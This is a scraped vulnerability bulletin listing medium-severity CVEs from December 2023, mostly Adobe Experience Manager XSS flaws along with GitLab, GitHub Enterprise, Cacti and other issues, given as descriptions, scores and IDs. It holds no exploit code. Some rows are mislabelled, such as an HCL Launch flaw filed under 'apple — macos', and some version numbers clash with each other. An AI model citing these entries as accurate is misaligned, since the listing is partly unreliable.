adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48591
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48592
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48593
[email protected]
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48594
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48595
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48596
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48597
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48598
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48599
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48600
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48601
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48602
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48603
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48604
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48605
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48606
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48607
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48609
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48610
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48611
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48612
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48613
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48614
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48615
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48616
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48617
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48618
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48619
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48620
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48621
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48622
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48623
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48624
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51457
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51458
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-20 | 5.4 | CVE-2023-51459
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51460
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-20 | 5.4 | CVE-2023-51461
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-20 | 5.4 | CVE-2023-51462
aiven-open — journalpump | journalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0. | 2023-12-21 | 6.5 | CVE-2023-51390
ansible — ansible | An absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path. | 2023-12-18 | 6.3 | CVE-2023-5115
apache — streampark | In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: `select * from table where jobName like '%jobName%'`. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. | 2023-12-15 | 4.9 | CVE-2023-30867
apache — superset | Uncontrolled resource consumption can be triggered by an authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets. This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1. | 2023-12-19 | 6.5 | CVE-2023-46104
apache — superset | A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue. | 2023-12-19 | 6.5 | CVE-2023-49736
apple — macos | HCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion. | 2023-12-21 | 5.3 | CVE-2023-45703
automad — automad | A vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 6.3 | CVE-2023-7037
automad — automad | A vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 4.7 | CVE-2023-7036
automad — automad | A vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 4.3 | CVE-2023-7038
aveva — edge | An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses. | 2023-12-16 | 5.3 | CVE-2021-42794
aws — aws-sdk-php | AWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1. | 2023-12-22 | 6 | CVE-2023-51651
bazarr — bazarr | Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols. | 2023-12-15 | 5.3 | CVE-2023-50266
beijing_baichuo — s210 | A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688. | 2023-12-21 | 6.3 | CVE-2023-7039
bosch — building_integration_system_video_engine | Improper handling of malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server, e.g. through Man-in-the-Middle attacks. | 2023-12-18 | 5.9 | CVE-2023-35867
bosch — cpp14_firmware | An information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet. | 2023-12-18 | 5.3 | CVE-2022-41677
cacti — cacti | Cacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). An earlier fix (CVE-2023-39360) can be bypassed, which leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is `graphs_new.php`. The impact of the vulnerability is execution of arbitrary JavaScript code in the attacked user’s browser. This issue has been patched in version 1.2.26. | 2023-12-22 | 6.1 | CVE-2023-49086
cacti — cacti | Cacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti. | 2023-12-22 | 6.1 | CVE-2023-49088
cacti — cacti | Cacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php`. When uploading an XML template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains the unfiltered XML template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available. | 2023-12-22 | 5.4 | CVE-2023-50250
clear — clearml_server | Cross-site Scripting (XSS) – Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (i.e., when a malicious party already has access to the internal network and to a user’s ClearML login credentials). | 2023-12-18 | 5.4 | CVE-2023-6778
clickhouse — clickhouse | ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited. | 2023-12-21 | 5.9 | CVE-2023-48298
codelyfe — stupid_simple_cms | A vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: ‘../filedir’. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability. | 2023-12-21 | 5.4 | CVE-2023-7041
codelyfe — stupid_simple_cms | A vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability. | 2023-12-21 | 4.3 | CVE-2023-7040
corveda — phpsandbox | A vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability. | 2023-12-19 | 4.3 | CVE-2014-125107
csharp — cws_collaborative_development_platform | SmartStar Software CWS is a web-based integration platform; it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information. | 2023-12-15 | 6.5 | CVE-2023-48374
dell — cpg_bios | Dell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system. | 2023-12-22 | 6.7 | CVE-2023-39251
dell — emc_networker | Dell NetWorker Virtual Edition versions 19.8 and below contain the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure. | 2023-12-18 | 5.3 | CVE-2023-28053
dfir-iris — iris-webIris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available.2023-12-224.6CVE-2023-50712
[email protected]
[email protected]
dfirkuiper — kuiperA vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.2023-12-185.9CVE-2023-6908
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
efacec — uc_500e | An attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application. | 2023-12-20 | 6.3 | CVE-2023-50703
efacec — uc_500e | An attacker could create malicious requests to obtain sensitive information about the web server. | 2023-12-20 | 5.3 | CVE-2023-50705
efacec — uc_500e | An attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users. | 2023-12-20 | 4.3 | CVE-2023-50704
efacec — uc_500e | A user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens. | 2023-12-20 | 4.1 | CVE-2023-50706
enterprise_server — enterprise_server | Improper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the “Get a check run” API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.0. | 2023-12-21 | 5.3 | CVE-2023-46646
enterprise_server — enterprise_server | An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 4.9 | CVE-2023-51379
enterprise_server — enterprise_server | Improper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 6.5 | CVE-2023-6804
enterprise_server — enterprise_server | A race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 5.8 | CVE-2023-6803
ethex — contracts | A vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271. | 2023-12-19 | 4.3 | CVE-2019-25157
gallagher — command_centre | Client-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior. | 2023-12-18 | 5.4 | CVE-2023-23570
gallagher — command_centre_diagnostics_service | A reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)). | 2023-12-18 | 5.5 | CVE-2023-46686
gallagher — command_centre_server | Incorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior. | 2023-12-18 | 4.3 | CVE-2023-23576
gallagher — command_centre_server | An observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all versions of 8.50 and prior. | 2023-12-18 | 4.3 | CVE-2023-23584
gallagher — controller_7000 | Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)). | 2023-12-18 | 6.8 | CVE-2023-6355
getsentry — symbolicator | Symbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`. | 2023-12-22 | 4.3 | CVE-2023-51451
github — enterprise_server | A path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2023-12-21 | 6.8 | CVE-2023-46645
github — enterprise_server | A race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 6.3 | CVE-2023-46649
gitlab — gitlab | An issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag. | 2023-12-15 | 6.5 | CVE-2023-6051
gitlab — gitlab | An issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names, leading to incorrect representation in the UI. | 2023-12-15 | 5.7 | CVE-2023-5512
gitlab — gitlab | An issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API. | 2023-12-15 | 4.3 | CVE-2023-5061
gradio — gradio | Gradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitrary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0. | 2023-12-22 | 5.6 | CVE-2023-51449
grails — grails | Grails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0. | 2023-12-21 | 6.5 | CVE-2023-46131
hcl_software — hcl_bigfix_mobile/modern_client_management | Due to this vulnerability, the Master operator could potentially incorporate an SVG tag into HTML, leading to an alert pop-up displaying a cookie. To mitigate stored XSS vulnerabilities, a preventive measure involves thoroughly sanitizing and validating all user inputs before they are processed and stored in the server storage. | 2023-12-21 | 6.6 | CVE-2023-28025
hcl_software — hcl_launch | HCL Launch is vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI potentially leading to sensitive information disclosure. | 2023-12-21 | 4.3 | CVE-2023-45700
